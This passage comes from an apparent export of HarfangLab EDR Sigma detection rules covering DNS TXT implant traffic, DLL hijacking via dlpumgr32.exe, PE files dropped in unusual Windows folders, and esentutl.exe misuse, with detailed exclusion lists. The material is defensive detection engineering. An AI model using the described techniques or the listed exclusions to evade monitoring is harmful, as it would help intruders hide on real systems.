'/usr/sbin/lshw'\n - '/usr/local/bin/forgejo'\n - '/usr/libexec/postfix/smtpd'\n - '/opt/puppetlabs/puppet/bin/ruby'\n - '/usr/bin/cloudflared'\n - '/usr/local/bin/cloudflared'\n\n exclusion_scan:\n # version.bind\n TextRecords: 'unbound ?.??.?'\n\n exclusion_spamcop:\n TextRecords|startswith: 'Blocked - see https://www.spamcop.net/bl.shtml?'\n\n 
exclusion_dkim:\n TextRecords|contains:\n - 'p=MIGf'\n - 'p= MIGf'\n - 'p=MIIBIj'\n - 'p= MIIBIj'\n QueryName|contains: '._domainkey.'\n\n exclusion_brevo:\n TextRecords|contains: 'brevo-code:??????????????????????'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1181e4c8-56a6-49c2-971f-caa5665133a3",
"rule_name": "Suspicious TXT DNS Resolution (Linux)",
"rule_description": "Detects a suspicious TXT DNS request that could be related to an implant communication.\nAdversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.\nIt is recommended to analyze the process at the origin of the request for malicious activities.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2026-01-12",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "118b000d-e5d7-48c7-a7cd-7f89310aa1b9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586261Z",
"creation_date": "2026-03-23T11:45:34.586266Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586274Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dlpumgr32.yml",
"content": "title: DLL Hijacking via dlpumgr32.exe\nid: 118b000d-e5d7-48c7-a7cd-7f89310aa1b9\ndescription: |\n Detects potential Windows DLL Hijacking via the DESlock+ User Manager executable dlpumgr32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate executable to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/04\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dlpumgr32.exe'\n ProcessSignature: 'DESlock Limited'\n ImageLoaded|endswith: '\\dlpprem32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\ESET\\'\n - '?:\\Program Files (x86)\\ESET\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\ESET\\'\n - '?:\\Program Files (x86)\\ESET\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'DESlock Limited'\n condition: selection and not 1 of 
filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "118b000d-e5d7-48c7-a7cd-7f89310aa1b9",
"rule_name": "DLL Hijacking via dlpumgr32.exe",
"rule_description": "Detects potential Windows DLL Hijacking via the DESlock+ User Manager executable dlpumgr32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "118fe9fa-f27d-4da6-bee4-85f73fe9c76c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071551Z",
"creation_date": "2026-03-23T11:45:34.071553Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071558Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1564/",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1564_pe_written_suspicious_location.yml",
"content": "title: PE File Written in Suspicious Location\nid: 118fe9fa-f27d-4da6-bee4-85f73fe9c76c\ndescription: |\n Detects the writing of a Portable Executable file in a suspicious location.\n Attacker can drop DLLs or PEs in unconventionnal directories to prevent security softwares or users seeing them.\n It is recommended to analyze the dropped file for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1564/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2023/07/10\nmodified: 2025/11/26\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564\n - attack.t1036\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n category: filesystem_write\n product: windows\ndetection:\n selection:\n FirstBytes|startswith: '4d5a'\n\n selection_appdata_1:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Roaming\\'\n filter_appdata_1:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Roaming\\\\*\\'\n\n selection_appdata_2:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\'\n filter_appdata_2:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\\\*\\'\n\n selection_appdata_3:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\Temp\\'\n filter_appdata_3:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\'\n\n selection_appdata_4:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\'\n\n selection_winsxs:\n Path|startswith: '?:\\Windows\\WinSxS\\'\n filter_winsxs:\n Path|startswith: '?:\\Windows\\WinSxS\\\\*\\'\n\n selection_prefetch:\n Path|startswith: '?:\\Windows\\Prefetch\\'\n filter_prefetch:\n Path|startswith: '?:\\Windows\\Prefetch\\\\*\\'\n\n selection_tasks:\n Path|startswith: '?:\\Windows\\Tasks\\'\n filter_tasks:\n Path|startswith: '?:\\Windows\\Tasks\\\\*\\'\n\n selection_system32_tasks:\n Path|startswith: '?:\\Windows\\system32\\Tasks\\'\n filter_system32_tasks:\n 
Path|startswith: '?:\\Windows\\system32\\Tasks\\\\*\\'\n\n selection_debug:\n Path|startswith: '?:\\Windows\\debug\\'\n filter_debug:\n Path|startswith: '?:\\Windows\\debug\\\\*\\'\n\n selection_tracing:\n Path|startswith: '?:\\Windows\\tracing\\'\n filter_tracing:\n Path|startswith: '?:\\Windows\\tracing\\\\*\\'\n\n selection_help:\n Path|startswith: '?:\\Windows\\help\\'\n filter_help:\n Path|startswith: '?:\\Windows\\help\\\\*\\'\n\n selection_logs:\n Path|startswith: '?:\\Windows\\logs\\'\n\n selection_fonts:\n Path|startswith: '?:\\Windows\\Fonts\\'\n\n selection_programdata:\n Path|startswith: '?:\\ProgramData\\'\n filter_programdata:\n Path|startswith: '?:\\ProgramData\\\\*\\'\n\n selection_user:\n Path|startswith:\n - '?:\\Users\\\\*\\Music\\'\n - '?:\\Users\\\\*\\Videos\\'\n - '?:\\Users\\\\*\\Pictures\\'\n - '?:\\Users\\\\*\\Contacts\\'\n - '?:\\Users\\\\*\\3D Objects\\'\n - '?:\\Users\\\\*\\Saved Games\\'\n - '?:\\Users\\\\*\\Links\\'\n - '?:\\Users\\\\*\\Favorites\\'\n filter_user_1:\n Path|startswith:\n - '?:\\Users\\\\*\\\\*\\Music\\'\n - '?:\\Users\\\\*\\\\*\\Videos\\'\n - '?:\\Users\\\\*\\\\*\\Pictures\\'\n - '?:\\Users\\\\*\\\\*\\Contacts\\'\n - '?:\\Users\\\\*\\\\*\\3D Objects\\'\n - '?:\\Users\\\\*\\\\*\\Saved Games\\'\n - '?:\\Users\\\\*\\\\*\\Links\\'\n - '?:\\Users\\\\*\\\\*\\Favorites\\'\n # Filtering out folders with 2 or more levels of depth\n filter_user_2:\n Path|startswith:\n - '?:\\Users\\\\*\\Music\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Videos\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Pictures\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Contacts\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\3D Objects\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Saved Games\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Links\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Favorites\\\\*\\\\*\\'\n\n selection_inf:\n Path|startswith: '?:\\Windows\\INF\\'\n\n selection_config:\n Path|startswith: '?:\\Windows\\System32\\config\\'\n filter_config:\n Path|startswith: '?:\\Windows\\System32\\config\\\\*\\'\n\n selection_evt:\n 
Path|startswith: '?:\\Windows\\System32\\winevt\\'\n\n selection_public:\n Path|startswith: '?:\\Users\\Public\\'\n filter_public:\n Path|startswith: '?:\\Users\\Public\\\\*\\'\n\n selection_perflogs:\n Path|startswith: '?:\\Perflogs\\'\n filter_perflogs:\n Path|startswith: '?:\\Perflogs\\\\*\\'\n\n exclusion_system:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_qlive:\n ProcessImage|endswith: '\\QQLive.exe'\n Path: '?:\\ProgramData\\QLDZModule.dll'\n\n exclusion_sesame:\n ProcessImage|endswith: '\\Sesame.exe'\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\\\*.dll'\n\n exclusion_itextsharp:\n Path: '?:\\Windows\\Fonts\\itextsharp.dll'\n\n exclusion_logs_pbr:\n ProcessImage:\n - '?:\\Windows\\System32\\systemsettingsadminflows.exe'\n - '?:\\WINDOWS\\system32\\omadmclient.exe'\n - '?:\\Windows\\System32\\systemreset.exe'\n - '?:\\Windows\\System32\\resetengine.exe'\n Path: '?:\\Windows\\Logs\\PBR\\\\*'\n\n exclusion_fonts:\n Path:\n - '?:\\Windows\\Fonts\\\\*.fon'\n - '?:\\Windows\\Fonts\\\\*.fot'\n - '?:\\Windows\\Fonts\\\\*.rra'\n - '?:\\Windows\\Fonts\\is-*.tmp'\n\n exclusion_explorer:\n ProcessImage: '?:\\windows\\Explorer.EXE'\n\n # When downloading files from browsers they create temporary extensions for files\n # For caching and verification. 
This could be reduced to a \"Downloads\" folder only.\n exclusion_browser_extensions:\n Path|endswith:\n - '.crdownload' # Chrome\n - '.part' # Firefox\n - '.partial' # Edge\n - '.download' # Safari\n - '\\Downloads\\\\????????-????-????-????-????????????.tmp'\n\n exclusion_migration_service:\n Path: '?:\\ProgramData\\UserProfileMigrationService.exe'\n\n exclusion_4kviddl:\n Path|startswith: '?:\\Users\\\\*\\Music\\4kvideodownloader\\'\n\n exclusion_tmp:\n Path: '?:\\Users\\\\*\\AppData\\Local\\Z@H!-*-??.tmp'\n\n exclusion_public:\n Path:\n - '?:\\Users\\Public\\AnyDesk.exe'\n - '?:\\Users\\Public\\gcapi.dll'\n - '?:\\Users\\Public\\python.exe'\n - '?:\\Users\\Public\\splunkdd.exe'\n - '?:\\Users\\Public\\splunkd.exe'\n\n exclusion_roaming:\n Path:\n - '?:\\Users\\\\*\\AppData\\Roaming\\DPInst.exe'\n - '?:\\Users\\\\*\\AppData\\Roaming\\gacutil.exe'\n - '?:\\Users\\\\*\\AppData\\Roaming\\PnPutil.exe'\n\n exclusion_uninstall:\n Path:\n # Files of the following format:\n # PyCharm2023.2_232.8660.197_Uninstall.exe\n - '?:\\ProgramData\\\\*20??.?_???.????.*_Uninstall.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\\\*20??.?_???.????.*_Uninstall.exe'\n\n exclusion_winscp:\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\winscp.rnd'\n\n exclusion_dotnet:\n Path|startswith:\n - '?:\\Users\\\\*\\\\*\\bin\\Debug\\net*\\'\n - '?:\\Users\\\\*\\\\*\\bin\\Release\\net*\\'\n\n exclusion_rollbacks:\n Path|startswith:\n - '?:\\Windows\\Logs\\PBR\\$Windows.~BT\\MigrationShims\\MigShim2\\'\n - '?:\\Windows\\Logs\\PBR\\$Windows.~BT_Rollback\\EFI\\Microsoft\\Boot\\'\n - '?:\\Windows\\Logs\\PBR\\Panther\\\\*\\MigrationShims\\MigShim2\\'\n - '?:\\Windows\\Logs\\PBR\\Panther\\Rollback\\EFI\\Microsoft\\Boot\\'\n - '?:\\Windows\\Logs\\PBR\\Panther\\_s_????.tmp'\n - '?:\\Windows\\Logs\\PBR\\Panther\\_s_???.tmp'\n\n exclusion_anydesk_dl:\n Path|endswith: '\\Downloads\\AnyDesk.exe'\n\n exclusion_redist:\n Path:\n - '?:\\Users\\\\*\\AppData\\Local\\TempDirectX?.EXE'\n - 
'?:\\Users\\\\*\\AppData\\Local\\TempDirectX??.EXE'\n - '?:\\Users\\\\*\\AppData\\Local\\Tempvcredist20??_x??.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Tempvcredist20??_20??_20??_x??.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\TempVC_redist.x??.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Tempvjredist64.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Tempvjredist.exe'\n\n exclusion_putty:\n Path: '?:\\Users\\\\*\\AppData\\Local\\PUTTY.RND'\n\n exclusion_sqlce:\n Path:\n - '?:\\Users\\\\*\\AppData\\Roaming\\sqlcecompact??.dll'\n - '?:\\Users\\\\*\\AppData\\Roaming\\sqlce????.dll'\n\n exclusion_clu:\n Path:\n - '?:\\Users\\\\*\\CLU_V*\\ComponentMgr.dll'\n - '?:\\Users\\\\*\\CLU_V*\\expat.dll'\n - '?:\\Users\\\\*\\CLU_V*\\libexpat.dll'\n - '?:\\Users\\\\*\\CLU_V*\\PMUdsCm.dll'\n - '?:\\Users\\\\*\\CLU_V*\\PMUdsDm.dll'\n - '?:\\Users\\\\*\\CLU_V*\\PMUsrApi.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RDHWebSercieMgr.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RdsMisc.dll'\n - '?:\\Users\\\\*\\CLU_V*\\restCdom.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RESTSDK.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RFUT.exe'\n - '?:\\Users\\\\*\\CLU_V*\\RInetwrp2.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RInetwrp.dll'\n - '?:\\Users\\\\*\\CLU_V*\\ServerMgr.dll'\n - '?:\\Users\\\\*\\CLU_V*\\SnmpGet.exe'\n - '?:\\Users\\\\*\\CLU_V*\\soapCdom.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapCls2.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapCls.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapDms.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapProx.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapUad.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapUD.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapUds.dll'\n - '?:\\Users\\\\*\\CLU_V*\\unzip32.dll'\n - '?:\\Users\\\\*\\CLU_V*\\zip32.dll'\n\n exclusion_motic_drivers:\n Path|startswith: '?:\\Windows\\INF\\Motic Drivers\\'\n\n exclusion_aee_tools:\n Path: '?:\\Users\\\\*\\AppData\\Local\\AEE-Tools'\n\n exclusion_installshield_uninstallers:\n Path:\n - '?:\\ProgramData\\\\*????.?_*_Uninstall.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\\\*????.?_*_Uninstall.exe'\n\n 
exclusion_polycom:\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\PolycomCompanionSetup.exe'\n\n exclusion_bit_tmp:\n Path:\n - '?:\\ProgramData\\BIT????.tmp'\n - '?:\\ProgramData\\BIT???.tmp'\n\n exclusion_bluestacks_tmp:\n Path: '?:\\ProgramData\\BlueStacksServicesSetup.exe.tmp'\n\n exclusion_cardpresso:\n Path: '?:\\ProgramData\\cardPresso.bin'\n\n exclusion_generic_uninstaller:\n Path:\n - '?:\\ProgramData\\\\*20??.?_???.?????.??_Uninstall.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\\\*20??.?_???.?????.??_Uninstall.exe'\n\n exclusion_keypass:\n Path:\n - '?:\\Users\\\\*\\KeePass Password Safe 2\\ShInstUtil.exe'\n - '?:\\Users\\\\*\\KeePass Password Safe 2\\unins000.exe'\n\n exclusion_setup_prod:\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\SetupProd_Act.exe'\n\n exclusion_mtxagent:\n ProcessImage: '?:\\Program Files\\BMC Software\\Client Management\\Client\\bin\\mtxagent.exe'\n ProcessSigned: 'true'\n\n # Just for fun: process used by the Spanish police to identify\n # users via their electronic identity card\n exclusion_dnieservice:\n Path: '?:\\Users\\\\*\\AppData\\Local\\DNIeService.exe'\n ProcessCommandLine: '?:\\windows\\system32\\svchost.exe -k netsvcs -s CertPropSvc'\n\n exclusion_ProfSvc:\n Path: '?:\\Users\\\\*\\AppData\\Local\\{????????-????-????-????-????????????}.tmp'\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s ProfSvc'\n\n exclusion_msmpeng:\n ProcessOriginalFileName: 'MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_bomgar:\n ProcessImage|endswith:\n - '\\bomgar-scc.exe'\n - '\\sra-scc.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Bomgar Corporation'\n - 'BeyondTrust Corporation'\n Path:\n - '?:\\ProgramData\\Z@S!-????????-????-????-????-????????????.tmp'\n - '?:\\ProgramData\\btsccoi-????????????????????????????????.exe'\n\n exclusion_bomgar_install:\n ProcessImage|endswith: '\\nstvstub.exe'\n ProcessCommandLine|contains|all:\n - ' --install '\n - ' --hwnd '\n 
Path: '?:\\ProgramData\\Z@S!-????????-????-????-????-????????????.tmp'\n\n exclusion_office_deployment_tool:\n ProcessImage|endswith: '\\officedeploymenttool_*.exe'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_mssense:\n ProcessImage: '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_autobackup:\n ProcessOriginalFileName: 'AutoBackup?Pro.exe'\n ProcessSignature: 'Fabrice PARISOT'\n\n exclusion_tsplus:\n ProcessImage:\n - '?:\\Program Files\\TSplus\\UserDesktop\\files\\svcr.exe'\n - '?:\\Program Files (x86)\\TSplus\\UserDesktop\\files\\svcr.exe'\n ProcessSignature: 'Remote Access World SAS'\n\n exclusion_installshield:\n ProcessImage:\n - '?:\\Program Files\\Common Files\\InstallShield\\Engine\\\\*\\Intel*\\IKernel.exe'\n - '?:\\Program Files (x86)\\Common Files\\InstallShield\\Engine\\\\*\\Intel*\\IKernel.exe'\n\n exclusion_fastviewer:\n ProcessSigned: 'true'\n ProcessSignature: 'FastViewer GmbH'\n Path: '?:\\Users\\\\*\\Music\\exe\\\\*.tmp'\n\n exclusion_hp:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\SecondaryApp.exe'\n\n exclusion_hp_devicestup:\n ProcessImage: '?:\\Program Files\\HP\\HP * series\\Bin\\DeviceSetup.exe'\n Path: '?:\\Users\\\\*\\AppData\\Local\\Full_Webpack-* _Full_Webpack.exe'\n\n exclusion_msiexec:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Path|startswith: '?:\\Windows\\INF\\'\n\n exclusion_installer:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\7z*\\setup.exe'\n Path:\n - '?:\\Users\\\\*\\AppData\\Local\\\\*.dll'\n - '?:\\Users\\\\*\\AppData\\Local\\\\*.exe'\n\n exclusion_eraser:\n ProcessImage|endswith: '\\Eraser.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Rare Ideas, LLC'\n Path: '?:\\ProgramData\\\\*.dll'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n Path|endswith: 
'\\{????????-????-????-????-????????????}.tmp'\n\n # Behringer X-USB\n exclusion_behringer:\n ProcessImage:\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\ns?????.tmp\\ns?????.tmp'\n Path:\n - '?:\\ProgramData\\CNE???.tmp'\n - '?:\\ProgramData\\CNE????.tmp'\n\n # LANDesk® Management Suite\n exclusion_landesk:\n ProcessImage:\n - '?:\\Windows\\Temp\\inst32.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\inst32.exe'\n ProcessDescription: 'INSTALL MFC Application'\n Path: '?:\\Windows\\Fonts\\zch????.tmp'\n\n exclusion_phpstorm:\n ProcessImage|endswith: '\\PhpStorm-????.?.?.exe'\n ProcessDescription: 'PhpStorm Windows Installer'\n Path|endswith: '\\PhpStorm????.?_*_Uninstall.exe'\n\n exclusion_proxynetworks:\n ProcessImage|endswith: '\\PhSvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Proxy Networks Inc.'\n Path: '?:\\ProgramData\\PHodCln-{????????-????-????-????-????????????}.exe'\n\n exclusion_magic:\n ProcessImage:\n - '?:\\Program Files\\MagicUtilities\\MagicMouseUtilities.exe'\n - '?:\\Program Files\\MagicUtilities\\MagicTrackpadUtilities.exe'\n - '?:\\Program Files\\MagicUtilities\\MagicKeyboardUtilities.exe'\n Path: '?:\\ProgramData\\fnebeqbh.fxh'\n\n exclusion_image:\n ProcessImage:\n - '?:\\Windows\\System32\\Robocopy.exe'\n - '?:\\Program Files\\7-Zip\\7zG.exe'\n\n condition: selection and 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "118fe9fa-f27d-4da6-bee4-85f73fe9c76c",
"rule_name": "PE File Written in Suspicious Location",
"rule_description": "Detects the writing of a Portable Executable file in a suspicious location.\nAttackers can drop DLLs or PEs in unconventional directories to prevent security software or users from seeing them.\nIt is recommended to analyze the dropped file for malicious content.\n",
"rule_creation_date": "2023-07-10",
"rule_modified_date": "2025-11-26",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036",
"attack.t1564"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "11f7107e-28d1-4486-afca-4379b68744b3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627287Z",
"creation_date": "2026-03-23T11:45:34.627289Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627293Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Esentutl/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1564/004/",
"https://attack.mitre.org/techniques/T1570/",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/software/S0404/"
],
"name": "t1218_esentutl.yml",
"content": "title: Esentutl.exe Execution\nid: 11f7107e-28d1-4486-afca-4379b68744b3\ndescription: |\n Detects the execution of esentutl.exe, a legitimate Windows database utility.\n Adversaries may misuse this tool to manipulate files, access sensitive data, or disable security measures.\n It is recommended to investigate the legitimacy of the esentutl.exe execution and review file accesses.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Esentutl/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1564/004/\n - https://attack.mitre.org/techniques/T1570/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/software/S0404/\ndate: 2021/07/09\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1564.004\n - attack.lateral_movement\n - attack.t1570\n - attack.command_and_control\n - attack.t1105\n - attack.s0404\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Esentutl\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\esentutl.exe'\n - OriginalFileName: 'esentutl.exe'\n\n # This is handled by the rule 8610a64e-eb0f-436c-b21d-33f757ea41f0\n filter_vss:\n CommandLine|contains|all:\n - ' /y '\n - ' /vss '\n\n exclusion_parentimage:\n ParentImage:\n - '?:\\Program Files\\Veritas\\NetBackup\\bin\\bpbkar32.exe'\n - '?:\\ProgramData\\Cyvera\\LocalSystem\\Download\\protected_payload_execution\\cortex-xdr-payload.exe'\n - '?:\\Program Files\\HDCleaner\\HDCleaner.exe'\n - '?:\\Program Files\\Magnet Forensics\\Magnet AXIOM\\AXIOM Process\\AXIOMProcess.exe'\n - '?:\\Program Files\\Symantec\\Backup Exec\\beremote.exe'\n\n exclusion_commandline:\n CommandLine:\n - 'esentutl.exe'\n - 'esentutl /g'\n - 'esentutl.exe /d 
